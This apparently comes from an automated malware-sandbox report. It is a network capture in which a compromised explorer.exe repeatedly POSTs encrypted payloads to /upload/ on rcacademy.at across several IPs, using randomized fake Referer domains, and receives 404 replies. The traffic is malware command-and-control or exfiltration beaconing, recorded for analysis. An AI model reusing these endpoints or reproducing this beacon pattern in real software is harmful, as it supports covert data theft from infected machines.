                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  22192.168.2.649835222.232.238.24380C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:16.797343969 CET20043OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gffroy.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 205
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:16.797380924 CET20044OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 56 14 fc ad
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuVkDAE0i007chy2KWt$<b~Mh}i)1zd>9FG3Z&
                                                                                                                                  Dec 18, 2021 15:32:17.964591026 CET21100INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:17 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  23192.168.2.649840218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:18.244738102 CET21101OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ysuckj.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 359
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:18.244764090 CET21102OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 2d 2a d0 8f
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu-*ZIRPI*~umcUXIZ!e O6s~N86a+H0o-y>qlq=7(8%xuk1k]vn7
                                                                                                                                  Dec 18, 2021 15:32:19.438575983 CET21774INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:18 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  24192.168.2.649841148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:19.871263027 CET21775OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://qmchuh.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 318
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:19.871454954 CET21775OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 54 33 b1 93
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuT3VNTMX5H0gPBrRQ=Zn"RH1.u}L-g;>eds_Q%%B)zFFl//2u
                                                                                                                                  Dec 18, 2021 15:32:20.422930956 CET21776INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:20 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  25192.168.2.649842218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:21.251153946 CET21777OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tnsiunfk.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 318
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:21.251415968 CET21777OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 46 56 be b9
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuFVNd}hj{SR>ke:[#)iXnH,ES8YZB_U;x|95d/o-}-1=cG|M9u'TS[;
                                                                                                                                  Dec 18, 2021 15:32:22.396996021 CET21778INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:21 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  26192.168.2.649843148.0.74.22980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:22.583885908 CET21779OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ydbdqcx.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 300
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:22.583964109 CET21779OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 6e 2a bb bd
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vun*e9rG_gkc(`mpB^2z|UY3W Pg3;{fS^%O%'L9nd2KOO0d{j/Vr%rQ(
                                                                                                                                  Dec 18, 2021 15:32:23.131725073 CET21780INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:22 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  27192.168.2.649844190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:23.404071093 CET21781OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://myjlsdvf.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 134
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:23.404803991 CET21781OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 7d 1a d1 83
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu}`$z~O+4Z*=uvBZWtd
                                                                                                                                  Dec 18, 2021 15:32:24.419090033 CET21793INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:23 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  28192.168.2.649847190.117.75.9180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:24.670314074 CET21794OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://jfeippj.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 271
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:24.670326948 CET21794OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 4f 40 a3 bd
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vuO@lx~^P_B%p O#5&>BHXZGSt5f0G^t(yu+,886JU- wftpQ1
                                                                                                                                  Dec 18, 2021 15:32:25.706753016 CET21795INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:25 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                                                  Content-Length: 334
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  29192.168.2.649848218.38.155.21080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Dec 18, 2021 15:32:25.978107929 CET21796OUTPOST /upload/ HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dgwuv.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 327
                                                                                                                                  Host: rcacademy.at
                                                                                                                                  Dec 18, 2021 15:32:25.978123903 CET21796OUTData Raw: 39 6e 54 17 81 cb 1a 2e a9 af b5 76 02 02 7b ba 7d 08 bd ec 1d 75 95 60 00 0b 0b 96 35 c2 c5 1d 9b 5d c1 5c 0f 1f 55 19 eb 9f 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 7b 58 fc b7
                                                                                                                                  Data Ascii: 9nT.v{}u`5]\U?*$`7C[zqNA -[k,vu{XLSiR~*|I*.j{@`T$T'/w<O<C,/%(&rLt(M-:K(ooS}4+se\%Ur
                                                                                                                                  Dec 18, 2021 15:32:26.829504967 CET21797INHTTP/1.0 404 Not Found
                                                                                                                                  Date: Sat, 18 Dec 2021 14:32:26 GMT
